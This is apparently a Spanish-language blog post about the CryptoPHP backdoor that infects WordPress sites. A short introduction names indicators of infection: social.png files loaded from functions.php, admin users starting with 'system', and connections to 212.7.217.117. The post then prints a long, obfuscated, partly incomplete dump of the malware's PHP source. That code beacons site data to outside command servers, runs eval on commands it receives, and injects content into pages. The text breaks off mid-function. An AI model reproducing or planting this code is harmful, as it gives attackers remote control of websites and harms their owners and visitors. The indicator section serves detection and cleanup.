CryptoPHP
En estos días a un cliente le ha surgido un problema en su CMS; para ser exactos, en su WordPress.
Como WordPress es un CMS de código abierto muy popular, le surgen muchas vulnerabilidades; aquí les comentaré este tipo de hackeo contra WordPress y cómo solucionarlo.
En esencia, este troyano está escondido dentro de un archivo .png que en realidad no es una imagen, sino un archivo de texto plano con código PHP escrito dentro de él. Este archivo suele esconderse con el nombre social.png y normalmente se carga mediante una función require o similar, casi siempre desde el archivo functions.php de algún tema o de un plug-in. Como require ejecuta el contenido del archivo sin importar su extensión, el código se ejecuta aunque el archivo parezca una imagen.
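El código malicioso lo mostraré aquí. Está ofuscado (los nombres de variables y funciones son cadenas aleatorias) y el listado aparece incompleto en algunos tramos. Al revisar un sitio conviene buscar lo que el propio código deja ver: archivos social.png (o social0.png, social1.png…) en el directorio del tema, una referencia a ellos en functions.php, usuarios administradores cuyo nombre empieza por «system» y conexiones salientes a 212.7.217.117: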
///////////////////////////////////////////////////////////////////////////////
TTsctbCBDGVyjyFVpVyp = $TTsctbCBDGVyjyFVpVyp; if ( $TTsctbCBDGVyjyFVpVyp === 1 ) { $rTfnEPRdToBnhSfwgHoC = "CREATE TABLE IF NOT EXISTS `#__options` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`option_name` text NOT NULL,
`value` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;"; $jiuOepDTQAtKPmDPlmA = JFactory::getDbo(); $jiuOepDTQAtKPmDPlmA->setQuery( $rTfnEPRdToBnhSfwgHoC ); $jiuOepDTQAtKPmDPlmA->query(); } if ( $TTsctbCBDGVyjyFVpVyp === 2 ) { $rTfnEPRdToBnhSfwgHoC = "CREATE TABLE IF NOT EXISTS `options` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`option_name` text NOT NULL,
`value` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;"; db_query( $rTfnEPRdToBnhSfwgHoC ); } $this->uQfIZmMpqyjCaRQMgMoc = array( '=02ow5FryW3ogkJnuWUq', '6yzLhDKqwETol92q', '==trcWzYyEKqwETol92q', 'g92LhZ3ni9Togyzr', '==DoiAzYiEKqiyKMgS2p', '=8zMhyzYhIJMlqzoi9Jo', '=bKnv5vpuE3phSJofI2n', 'aW3ohHzMckzp19JM2y2M', '=02ow5PoyITqmEJquWaM', '==DoiAzY6ITqu1JLgkJL', 'g92LhpzockTocM2oaWKM', '==toc5vo1AKMaSTofyzq', '==jqj5FqiyKMwyzoyA2p', '3OaY1WGoj1JL', '=pUphxKqaWKnuu2L', '=4JnhVKMeAJnfMJock2p', '=4JnhV3ox5JLl9TryuTq', 'hyzYmk2oiEaoyk2M', 'hyzYh9TqlSzLhSTM', '=4JnhNKqiW3Mf9TogyzL', '==toc5lp0Szp0SzM', 'hyzYfIJM0Aaouu2L', 'hyzYlSTqm92Mhyzp', 'aW3ohHTo5E3pgHJocW3L', '==trcWzYmgJLgyTqf9zM', '==Nqy5zYmAKMhy2M0ITo0I3o', '==jqj5PnmyzMiEUnmyzp', '==jqj5lphS2pfIzquWUq', '==trcWzYlITMuk2Mc5Jq', '0IzohZUocSzMlITMh92q', '0IzohZKMfyUqm52ohITr', '=pzpi5vouEKn0g2LukzL', '==trcWzYfy2MlITqhIUn', '=bKnv5FM4S2nfyJo', '=bKnv5PqcgJLgSzp', '==trcWzYfk2ovITqiIKp', '==DoiAzYm52ox1zM', '=02ow5lpwy2p11JLlSTM', '=02ow5vpyWzLiWzpyq2MiWaM', '=02ow5lphIJof92n', '=02ow5lpykTpgS2pi9zM', '==DoiAzYmEzpu9zL2EKo', '==trcWzYmyKLxIao', 'iMzoc5lp5kzMx5JLlS2L', '==jow5lqikTn0SJo', '=82Lh82nhIJo', '==toc5lp3Izo3SJo', '=4Jnhf2LiWKolITq', 'hyzYeA2olIzoiE3p', '=4Jnh82oz1zM', 'hyzY0WKLjSJMyWaM', '==toc5PMhSTolSTqcI3M', '==toc5vou12MiWUp', '==toc5voz1zM', 'hyzYj9TouWKMhI2M', '=8zMhyzYykTpgS2pi9zM', '==joz5JnhHJMlMTAiWTn', '==joz5JnhHaZhITqmyTo', '=8zMhyzYyqJLjgzo', '3OaYm5JqaWzM', '=pUphH2nuEaZwyTp', '=pUphZapyE3pu1JMmIzocu2L', '=pUphxUMukJr6SToi9zM', '3OaYyAKqi92n', '0IzohxKLxIao', '=DKMh5Fne9TMhyzM', '==Nqy5zY5kzMx5JLlS2L', '==Nqy5zYi9zMgyzM', '==Nqy5zY392qzqKL', '==DoiAzYyyao2EKo', '=02ow5lpuyTMySKney2q', 'g92Lh4JMwEapiO3p', '=02ow5FMyWaM2EKo', '==DoiAzYwyJou5Jrx9JolIJo', 'g92LhDJMfkJLlIzquk2p', '=pzpi5FLc9zouWKLyO3p', '=DKMh5ln1kTnaI3oluTq', 'g92Lh0zpiE3pcAaoiO3p', '==DoiAzYcEaouW3MuyTM', '==DoiAzYyAzouE3pcAKMg9TM', '==DoiAzY5WKL0yTocWJnmSJM', '==DoiAzYaWKqvAUq0y2n', 'g92Lh0Jrh9zouqJq', '=02ow5PouITqmIKL', 
'g92LhZUqcAKn2yTM', 'g92LhRzquqUql9Tn', '=02ow5PocEao19Jo', 'g92Lh4zpyEaoc9Tp', '==DoiAzYiEKLl9Tpl92LhyTo', 'g92Lhx3LuAJnfI2MlSTo', '==DoiAzYlI2Mu52olIJL', '==DoiAzYuu2pa5JnlIUM', '==DoiAzYmWKMg92LhyTo', '==DoiAzY3Izo3SJo' ); $this->YJPpcHYXiHzJcujCRMrl(); $this->RYXaXWzmuNWbJhAAdkYk = FALSE; $ANVoslonRNQSwwQloQTx = VpLgOEumcbcbVAoDSkNT( WP_OPTION_KEY ); if ( $ANVoslonRNQSwwQloQTx == NULL || $ANVoslonRNQSwwQloQTx == 'null' ) { $ANVoslonRNQSwwQloQTx = ''; } if ( $ANVoslonRNQSwwQloQTx == '' ) { $this->QchKkLFzBKbvSGpfvxRI = TRUE; $this->wbpSSSviIAVdaxozPaIs = new ozUEwvGfThFPKEOwkFic( 'new' ); $this->ROnGXakeZGHvnAshuA(); } else { $this->wbpSSSviIAVdaxozPaIs = new ozUEwvGfThFPKEOwkFic(); $this->ANVoslonRNQSwwQloQTx = $this->QcBvXJgXvjtpioOEqpI( $ANVoslonRNQSwwQloQTx, TRUE ); if ( isset( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'publicKey' ] ) ) { $this->wbpSSSviIAVdaxozPaIs->duINcvAvMBjVFAOeQCrT( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'publicKey' ] ); } } if ( $this->DykThtAuUVJVJpGjiOJr() ) { return FALSE; } $this->CPKWpEiLdpAqNsEEXLrF(); $this->TEDQAgcgMDuJlbEkvHlU(); if ( ! $this->QchKkLFzBKbvSGpfvxRI ) { $this->MMojNlkoXMbZUoUEZurV(); } if ( $TTsctbCBDGVyjyFVpVyp === 0 ) { $WDWTfYxwxTMIIsMmHXVV = '_site_transient_check_config_'; if ( function_exists( 'get_home_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( get_home_url() ),3, 5 ); } elseif ( function_exists( 'get_site_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr( md5( get_site_url() ), 3, 5); } else { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( $_SERVER[ 'DOCUMENT_ROOT' ]) , 3, 5); } $MRClNpYsnlwZouJryjis = get_option( $WDWTfYxwxTMIIsMmHXVV, 0 ); $vQywbdKjWZluiwIxsQXa = time(); if ( $MRClNpYsnlwZouJryjis === 0 && !defined( '_wp_transient_config' )) { update_option( $WDWTfYxwxTMIIsMmHXVV, $vQywbdKjWZluiwIxsQXa ); $VbGBDDCPOXeYPOvSatBl = new IaLpFyUtkdDdtRnEDrJ(); } if ( ! 
defined( '_wp_active_plugins' ) ) { $gcAQATpMyBEOsCKgBRQG = pathinfo( __FILE__, PATHINFO_BASENAME ); $crnDNpdYNrpaBnqZgrgc = plugin_basename( __FILE__ ); $FZxyFcxHIgRadtHnDvWU = str_replace( $gcAQATpMyBEOsCKgBRQG, '', $crnDNpdYNrpaBnqZgrgc ); $uNKzgVGGqGPxHeRkgqRX = get_option( 'active_plugins', array() ); foreach ( $uNKzgVGGqGPxHeRkgqRX as $afaaIklbzorYXAlUjNPh ) { if ( strpos( $afaaIklbzorYXAlUjNPh, $FZxyFcxHIgRadtHnDvWU ) !== FALSE ) { $gcAQATpMyBEOsCKgBRQG = WP_PLUGIN_DIR . '/' . $afaaIklbzorYXAlUjNPh; register_deactivation_hook( $gcAQATpMyBEOsCKgBRQG, 'jqryqFBMrHdVpgSfpDad' ); break; } } } } } private function DykThtAuUVJVJpGjiOJr() { if ( !isset( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ) || strlen( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ) < 3 ) { return false; }else{ $dRxgBmOpUKkRaEKwAISv = substr( md5( $this->ANVoslonRNQSwwQloQTx['info']['serverKey'] ) , 3 , 5 ); } if ( isset( $_COOKIE[ $dRxgBmOpUKkRaEKwAISv ] ) ) { return TRUE; } if ( function_exists( 'is_user_logged_in' ) ) { if ( is_user_logged_in() ) { setcookie( $dRxgBmOpUKkRaEKwAISv, '1', time() + 93312000 ); return TRUE; } } return FALSE; } private function ROnGXakeZGHvnAshuA() { if ( ! 
defined( 'wp_newData' ) ) { $ClbAffTqwdfsStqVgzyq = $this->bQhqyjECNagHOENBeGGx(); $ClbAffTqwdfsStqVgzyq[ 'publicKey' ] = $this->wbpSSSviIAVdaxozPaIs->NgHMLtrOrvggBbUUtHKW(); $this->ClbAffTqwdfsStqVgzyq = $ClbAffTqwdfsStqVgzyq; $thcjWzdsMailOnImWlBT = FALSE; foreach ( $this->frtYLIADcPvIgOOOlqwP() as $ZRhtpGOgTZTZRdeSYVBw ) { if (empty($ZRhtpGOgTZTZRdeSYVBw)) { continue; } $ANVoslonRNQSwwQloQTx = $this->oAkCruOFAQbOjyqcMZMw( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq ); $ANVoslonRNQSwwQloQTx = $this->sBqtxkmIaYHzAKLEdCcI( $ANVoslonRNQSwwQloQTx ); if ( $ANVoslonRNQSwwQloQTx !== FALSE ) { $thcjWzdsMailOnImWlBT = TRUE; if ( $this->RYXaXWzmuNWbJhAAdkYk ) { break; } break; } } if ( $thcjWzdsMailOnImWlBT ) { if ( $this->RYXaXWzmuNWbJhAAdkYk ) { $ANVoslonRNQSwwQloQTx = $this->jvhauOzYacIijjJXbEGB(); } $ANVoslonRNQSwwQloQTx[ 'info' ] = $ClbAffTqwdfsStqVgzyq; $this->xjUhToBfRhZlhXGMjiqQ( WP_OPTION_KEY, $ANVoslonRNQSwwQloQTx ); $this->ANVoslonRNQSwwQloQTx = $ANVoslonRNQSwwQloQTx; } else { $ANVoslonRNQSwwQloQTx = $this->jvhauOzYacIijjJXbEGB(); $ANVoslonRNQSwwQloQTx[ 'info' ] = $ClbAffTqwdfsStqVgzyq; $this->ANVoslonRNQSwwQloQTx = $ANVoslonRNQSwwQloQTx; $this->xjUhToBfRhZlhXGMjiqQ( WP_OPTION_KEY, $ANVoslonRNQSwwQloQTx ); } return $ANVoslonRNQSwwQloQTx; } return FALSE; } private function CPKWpEiLdpAqNsEEXLrF(){ if ( @$_REQUEST[ $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ] == 'reset' ) { $this->MMojNlkoXMbZUoUEZurV( 1, urldecode( $_REQUEST[ 'url' ] ) ); } if ( @$_REQUEST[ $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ] == 'update' ) { $this->MMojNlkoXMbZUoUEZurV( 1 ); } if ( @$_REQUEST[ $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ] == 'update' ) { $this->MMojNlkoXMbZUoUEZurV( 1 ); } } public function TEDQAgcgMDuJlbEkvHlU() { $ANVoslonRNQSwwQloQTx = $this->ANVoslonRNQSwwQloQTx; if ( ! isset( $ANVoslonRNQSwwQloQTx ) || $ANVoslonRNQSwwQloQTx == NULL ) { return; } if ( ! 
is_array( $ANVoslonRNQSwwQloQTx ) || $ANVoslonRNQSwwQloQTx == '' ) { return; } if ( @$ANVoslonRNQSwwQloQTx[ 'info' ][ 'eval' ] == 1 ) { if ( is_array( @$ANVoslonRNQSwwQloQTx[ 'eval' ] ) ) { foreach ( @$ANVoslonRNQSwwQloQTx[ 'eval' ] as $JbpGMBCRMNNqYrllqogh ) { eval( $JbpGMBCRMNNqYrllqogh ); } } } if ( isset( $ANVoslonRNQSwwQloQTx[ 'echo' ] ) ) { if ( ! defined( 'wp_footerLeo' ) ) { if ( $this->TTsctbCBDGVyjyFVpVyp == 0 ) { add_action( 'wp_head', array( $this, 'JLKCxmYDqGERxDYMhmOj' ) ); add_action( 'wp_footer', array( $this, 'JLKCxmYDqGERxDYMhmOj' ) ); @ob_start( 'JLKCxmYDqGERxDYMhmOj' ); } if ( $this->TTsctbCBDGVyjyFVpVyp == 1 ) { $NEKXukygfLoADkopeheR = JResponse::getBody(); $TyesFaUGdbAsPGadCnwt = &JFactory::getDocument(); ob_start(); $this->JLKCxmYDqGERxDYMhmOj(); $pnbgYzqXMNjqSBORSeLB = ob_get_contents(); ob_end_clean(); $NEKXukygfLoADkopeheR = preg_replace( "/(\)/", "$1 $pnbgYzqXMNjqSBORSeLB", $NEKXukygfLoADkopeheR ); JResponse::setBody( $NEKXukygfLoADkopeheR ); } if ( $this->TTsctbCBDGVyjyFVpVyp == 2 ) { } } } } public function JLKCxmYDqGERxDYMhmOj($aZkalCUWtsxgyfejJWSS = false) { if ( isset( $GLOBALS[ 'wp_run_crx' ] ) ) { return $aZkalCUWtsxgyfejJWSS; } $GLOBALS[ 'wp_run_crx' ] = 1; $ANVoslonRNQSwwQloQTx = $this->ANVoslonRNQSwwQloQTx; foreach ( $ANVoslonRNQSwwQloQTx[ 'echo' ] as $gTFusccXHODHdNfTRcIr ) { if ( $aZkalCUWtsxgyfejJWSS != FALSE ) { str_replace( "rFofWoxFwVRGhuCOjsaK = str_replace( $MsLKWZubUpwZsXweShFg, "", $rFofWoxFwVRGhuCOjsaK ); return $this->rFofWoxFwVRGhuCOjsaK; } private function frtYLIADcPvIgOOOlqwP() { $ANVoslonRNQSwwQloQTx = array(); foreach ( $this->uQfIZmMpqyjCaRQMgMoc as $ZRhtpGOgTZTZRdeSYVBw ) { $ANVoslonRNQSwwQloQTx[ ] = base64_decode( str_rot13( strrev( $ZRhtpGOgTZTZRdeSYVBw ) ) ); } if ( isset( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] ) ) { $RIDSsUypyvhaOoRUSAVT = (int) ( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] / 100 ); if ( $RIDSsUypyvhaOoRUSAVT == 0 ) { $RIDSsUypyvhaOoRUSAVT = 5; } else { $RIDSsUypyvhaOoRUSAVT *= 5; } 
} else { $RIDSsUypyvhaOoRUSAVT = 5; } return $this->TSmgHGGpCOaFpIQthvlU( $ANVoslonRNQSwwQloQTx, $RIDSsUypyvhaOoRUSAVT ); } private function kxNFPkmoRjlpKMZgBBSt( $nAdZoAdkHIGJvIPtmRmT ) { $ANVoslonRNQSwwQloQTx = array(); foreach ( $this->ANVoslonRNQSwwQloQTx[ 'emails' ] as $fzzoeSAOApURHlkJwYWs ) { $ANVoslonRNQSwwQloQTx[ ] = $fzzoeSAOApURHlkJwYWs; } foreach ( $this->keXZeLlUjrISqwBQePlM as $fzzoeSAOApURHlkJwYWs ) { $ANVoslonRNQSwwQloQTx[ ] = base64_decode( str_rot13( strrev( $fzzoeSAOApURHlkJwYWs ) ) ); } return $this->TSmgHGGpCOaFpIQthvlU( $ANVoslonRNQSwwQloQTx, $nAdZoAdkHIGJvIPtmRmT ); } private function bQhqyjECNagHOENBeGGx() { if ( ! defined( 'wp_getInfoData' ) ) { $ANVoslonRNQSwwQloQTx = array(); $ANVoslonRNQSwwQloQTx[ 'host' ] = $this->YJPpcHYXiHzJcujCRMrl(); $ANVoslonRNQSwwQloQTx[ 'page' ] = $_SERVER[ 'REQUEST_URI' ]; $ANVoslonRNQSwwQloQTx[ 'ip' ] = $_SERVER[ 'SERVER_ADDR' ]; $ANVoslonRNQSwwQloQTx[ 'eval' ] = $this->iIkbNPOMzHBEaGLuayXw(); $ANVoslonRNQSwwQloQTx[ 'exec' ] = $this->schzwZIoqdCTflLjVBrW(); $ANVoslonRNQSwwQloQTx[ 'serverKey' ] = $this->ERCpAYkPoxkdbTLfQwev(); $ANVoslonRNQSwwQloQTx[ 'run' ] = 0; $ANVoslonRNQSwwQloQTx[ 'type' ] = $this->TTsctbCBDGVyjyFVpVyp; $ANVoslonRNQSwwQloQTx[ 'ver' ] = 1.0; $ANVoslonRNQSwwQloQTx[ 'started' ] = date( 'Ymd' ); $ANVoslonRNQSwwQloQTx[ 'last_connect' ] = date( 'Ymd' ); $this->ClbAffTqwdfsStqVgzyq = $ANVoslonRNQSwwQloQTx; return $ANVoslonRNQSwwQloQTx; } return FALSE; } private function ERCpAYkPoxkdbTLfQwev( $WOvxjgelkBHhHJvNcmNG = 10 ) { $MsLKWZubUpwZsXweShFg = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $MTOgwpITDJOdGfIbmww = ''; for ( $xLyDQzORkZZbMOednjNE = 0 ; $xLyDQzORkZZbMOednjNE < $WOvxjgelkBHhHJvNcmNG ; $xLyDQzORkZZbMOednjNE ++ ) { $MTOgwpITDJOdGfIbmww .= $MsLKWZubUpwZsXweShFg[ rand( 0, strlen( $MsLKWZubUpwZsXweShFg ) - 1 ) ]; } return $MTOgwpITDJOdGfIbmww; } public function MMojNlkoXMbZUoUEZurV($qcquFjFPdpAwnQIbpBRH = false, $ZRhtpGOgTZTZRdeSYVBw = null) { $ANVoslonRNQSwwQloQTx = 
$this->ANVoslonRNQSwwQloQTx; if ( ! defined( 'wp_checkUpdate' ) ) { if ( @$ANVoslonRNQSwwQloQTx[ 'info' ][ 'last_connect' ] < date( 'Ymd' ) || $qcquFjFPdpAwnQIbpBRH ) { $ANVoslonRNQSwwQloQTx = $this->zpYUVZJHzzfDLRiDDsLK( $ANVoslonRNQSwwQloQTx, $ZRhtpGOgTZTZRdeSYVBw ); if ( $ANVoslonRNQSwwQloQTx == FALSE ) { return; } else { unset( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] ); } $ANVoslonRNQSwwQloQTx[ 'info' ][ 'last_connect' ] = date( 'Ymd' ); $ANVoslonRNQSwwQloQTx[ 'info' ][ 'run' ] ++; $this->xjUhToBfRhZlhXGMjiqQ( WP_OPTION_KEY, $ANVoslonRNQSwwQloQTx ); } } } private function zpYUVZJHzzfDLRiDDsLK( $ANVoslonRNQSwwQloQTx , $ZRhtpGOgTZTZRdeSYVBw) { if ( ! defined( 'wp_updateData' ) ) { if ( isset( $ZRhtpGOgTZTZRdeSYVBw ) ) { $this->EYtAUHIreQzDKeiVNfCU( array( $ZRhtpGOgTZTZRdeSYVBw ), $ANVoslonRNQSwwQloQTx ); } $uQfIZmMpqyjCaRQMgMoc = @$ANVoslonRNQSwwQloQTx[ 'servers' ]; $WVnZYORFsYkxVCRWs = $this->EYtAUHIreQzDKeiVNfCU( $uQfIZmMpqyjCaRQMgMoc, $ANVoslonRNQSwwQloQTx ); if ( $WVnZYORFsYkxVCRWs !== FALSE ) { return $WVnZYORFsYkxVCRWs; } $WVnZYORFsYkxVCRWs = $this->EYtAUHIreQzDKeiVNfCU( $this->frtYLIADcPvIgOOOlqwP(), $ANVoslonRNQSwwQloQTx ); if ( $WVnZYORFsYkxVCRWs !== FALSE ) { return $WVnZYORFsYkxVCRWs; } } return FALSE; } private function EYtAUHIreQzDKeiVNfCU( $uQfIZmMpqyjCaRQMgMoc, $ANVoslonRNQSwwQloQTx ) { foreach ( $uQfIZmMpqyjCaRQMgMoc as $ZRhtpGOgTZTZRdeSYVBw ) { $WVnZYORFsYkxVCRWs = $this->ElmztdVzbngvxQDztI( $ZRhtpGOgTZTZRdeSYVBw, $ANVoslonRNQSwwQloQTx[ 'info' ], $ANVoslonRNQSwwQloQTx ); if ( $WVnZYORFsYkxVCRWs != FALSE ) { if ( ! isset( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ] ) ) { $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ] = 0; } if ( $this->RYXaXWzmuNWbJhAAdkYk ) { $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ] ++; if ( ! 
isset( $xLyDQzORkZZbMOednjNE ) ) { $xLyDQzORkZZbMOednjNE = (int) ( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ] / 5 ); } if ( $xLyDQzORkZZbMOednjNE > 0 ) { $xLyDQzORkZZbMOednjNE --; continue; } } if ( $this->RYXaXWzmuNWbJhAAdkYk ) { return $ANVoslonRNQSwwQloQTx; } $WVnZYORFsYkxVCRWs[ 'info' ][ 'empty' ] = -- $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ]; return $WVnZYORFsYkxVCRWs; } } return FALSE; } private function ElmztdVzbngvxQDztI( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq, $ANVoslonRNQSwwQloQTx ) { $this->RYXaXWzmuNWbJhAAdkYk = FALSE; $rckdssQxbXVPjhExNdhX = $this->oAkCruOFAQbOjyqcMZMw( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq ); $rckdssQxbXVPjhExNdhX = $this->sBqtxkmIaYHzAKLEdCcI( $rckdssQxbXVPjhExNdhX ); if ( $rckdssQxbXVPjhExNdhX != FALSE ) { if ( $this->RYXaXWzmuNWbJhAAdkYk ) { return $ANVoslonRNQSwwQloQTx; } $rckdssQxbXVPjhExNdhX[ 'info' ] = $ClbAffTqwdfsStqVgzyq; return $rckdssQxbXVPjhExNdhX; } return FALSE; } private function sBqtxkmIaYHzAKLEdCcI( $ANVoslonRNQSwwQloQTx ) { if ( ! defined( 'wp_validData' ) ) { if ( ! isset( $this->ClbAffTqwdfsStqVgzyq ) ) { $this->ClbAffTqwdfsStqVgzyq = $this->ANVoslonRNQSwwQloQTx[ 'info' ]; } if ( md5( $this->ClbAffTqwdfsStqVgzyq[ 'serverKey' ] ) == $ANVoslonRNQSwwQloQTx ) { $this->RYXaXWzmuNWbJhAAdkYk = TRUE; return TRUE; } $ANVoslonRNQSwwQloQTx = $this->wbpSSSviIAVdaxozPaIs->fakDjKdyfxqzqCVYUs( $ANVoslonRNQSwwQloQTx ); $ANVoslonRNQSwwQloQTx = json_decode( $ANVoslonRNQSwwQloQTx, TRUE ); if ( $ANVoslonRNQSwwQloQTx == FALSE ) { return FALSE; } else { if ( ! isset( $ANVoslonRNQSwwQloQTx[ 'servers' ] ) ) { return FALSE; } } return $ANVoslonRNQSwwQloQTx; } return FALSE; } private function sakCZboUKVgZcavmOLlv( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq ) { $XpVWhYQezAsCoguzeUk = NULL; $ZRhtpGOgTZTZRdeSYVBw = 'http://' . 
$ZRhtpGOgTZTZRdeSYVBw; if ( function_exists( 'curl_version' ) ) { $cPQDNzaFpBKRxzJrBNZG = curl_init(); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_URL, $ZRhtpGOgTZTZRdeSYVBw ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_RETURNTRANSFER, 1 ); @curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_FOLLOWLOCATION, TRUE ); if ( isset( $ClbAffTqwdfsStqVgzyq ) && is_array( $ClbAffTqwdfsStqVgzyq ) ) { curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POST, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CUSTOMREQUEST, "POST" ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POSTFIELDS, $ClbAffTqwdfsStqVgzyq ); } curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CONNECTTIMEOUT, 10 ); $XpVWhYQezAsCoguzeUk = curl_exec( $cPQDNzaFpBKRxzJrBNZG ); curl_close( $cPQDNzaFpBKRxzJrBNZG ); } elseif ( function_exists( 'fsockopen' ) ) { $DfDZKkNFaULmGrCVkdmO = parse_url( $ZRhtpGOgTZTZRdeSYVBw ); $FYxyvybywDQZOUsbpyEd = ( isset( $DfDZKkNFaULmGrCVkdmO[ 'port' ] ) && $DfDZKkNFaULmGrCVkdmO[ 'port' ] ) ? (int) $DfDZKkNFaULmGrCVkdmO[ 'port' ] : 80; $NXdTbsKfmSOvfgWeGQma = ( isset( $DfDZKkNFaULmGrCVkdmO[ 'path' ] ) && $DfDZKkNFaULmGrCVkdmO[ 'path' ] ) ? $DfDZKkNFaULmGrCVkdmO[ 'path' ] : '/'; if ( isset( $DfDZKkNFaULmGrCVkdmO[ 'query' ] ) && $DfDZKkNFaULmGrCVkdmO[ 'query' ] ) { $NXdTbsKfmSOvfgWeGQma .= '?' . $DfDZKkNFaULmGrCVkdmO[ 'query' ]; } if ( $nWTGWQDrNcMlYfY = @fsockopen( $DfDZKkNFaULmGrCVkdmO[ 'host' ], $FYxyvybywDQZOUsbpyEd, $CUchiqUmYextPVnfusIF, $RmvXBnmlEOCDzFpLtnQh, 10 ) ) { fwrite( $nWTGWQDrNcMlYfY, "POST {$NXdTbsKfmSOvfgWeGQma} HTTP/1.1\r\n" ); fwrite( $nWTGWQDrNcMlYfY, "Host: {$DfDZKkNFaULmGrCVkdmO['host']}\r\n" ); if ( isset( $ClbAffTqwdfsStqVgzyq ) && is_array( $ClbAffTqwdfsStqVgzyq ) ) { $BwKJfYtBWvwlFPSYbYFU = http_build_query( $ClbAffTqwdfsStqVgzyq ); fwrite( $nWTGWQDrNcMlYfY, "Content-Type: application/x-www-form-urlencoded\r\n" ); fwrite( $nWTGWQDrNcMlYfY, "Content-Length: " . strlen( $BwKJfYtBWvwlFPSYbYFU ) . 
"\r\n" ); fwrite( $nWTGWQDrNcMlYfY, "Connection: close\r\n" ); fwrite( $nWTGWQDrNcMlYfY, "\r\n" ); fwrite( $nWTGWQDrNcMlYfY, $BwKJfYtBWvwlFPSYbYFU ); } fwrite( $nWTGWQDrNcMlYfY, "Connection: close\r\n" ); $BwKJfYtBWvwlFPSYbYFU = ''; while ( ! feof( $nWTGWQDrNcMlYfY ) ) { $BwKJfYtBWvwlFPSYbYFU .= fgets( $nWTGWQDrNcMlYfY, 4096 ); } fclose( $nWTGWQDrNcMlYfY ); $OBZOxZtsmJECmtOofbw = explode( "\r\n\r\n", $BwKJfYtBWvwlFPSYbYFU, 2 ); $BwKJfYtBWvwlFPSYbYFU = NULL; $XpVWhYQezAsCoguzeUk = isset( $OBZOxZtsmJECmtOofbw[ 1 ] ) ? trim( $OBZOxZtsmJECmtOofbw[ 1 ] ) : ''; if ( $XpVWhYQezAsCoguzeUk ) { $VuvXgWrUCVhuPJHEMqFV = strpos( $XpVWhYQezAsCoguzeUk, '{' ); if ( $VuvXgWrUCVhuPJHEMqFV !== FALSE ) { $XpVWhYQezAsCoguzeUk = substr( $XpVWhYQezAsCoguzeUk, $VuvXgWrUCVhuPJHEMqFV ); } $VuvXgWrUCVhuPJHEMqFV = strrpos( $XpVWhYQezAsCoguzeUk, '}' ); if ( $VuvXgWrUCVhuPJHEMqFV !== FALSE ) { $XpVWhYQezAsCoguzeUk = substr( $XpVWhYQezAsCoguzeUk, 0, $VuvXgWrUCVhuPJHEMqFV + 1 ); } } } } return $XpVWhYQezAsCoguzeUk; } private function oAkCruOFAQbOjyqcMZMw( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq = NULL, $lCTNLabxnOcjyrYcxGfw = NULL ) { if ( strstr( $ZRhtpGOgTZTZRdeSYVBw, $_SERVER[ 'HTTP_HOST' ] ) || empty($ZRhtpGOgTZTZRdeSYVBw) || trim( $ZRhtpGOgTZTZRdeSYVBw ) == '' ) { return FALSE; } if ( isset( $ClbAffTqwdfsStqVgzyq ) ) { $uoZKldafGapBNDDpFNBP = json_encode( $ClbAffTqwdfsStqVgzyq ); $ANVoslonRNQSwwQloQTx = $this->wbpSSSviIAVdaxozPaIs->XdjJpcCkQalYGiLHaNXR( $uoZKldafGapBNDDpFNBP ); $ClbAffTqwdfsStqVgzyq = array( "serverKey" => $ClbAffTqwdfsStqVgzyq[ 'serverKey' ], "data" => $ANVoslonRNQSwwQloQTx[ 'data' ], "key" => $ANVoslonRNQSwwQloQTx[ 'key' ] ); } while ( TRUE ) { $ANVoslonRNQSwwQloQTx = $this->sakCZboUKVgZcavmOLlv( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq ); if ( ! 
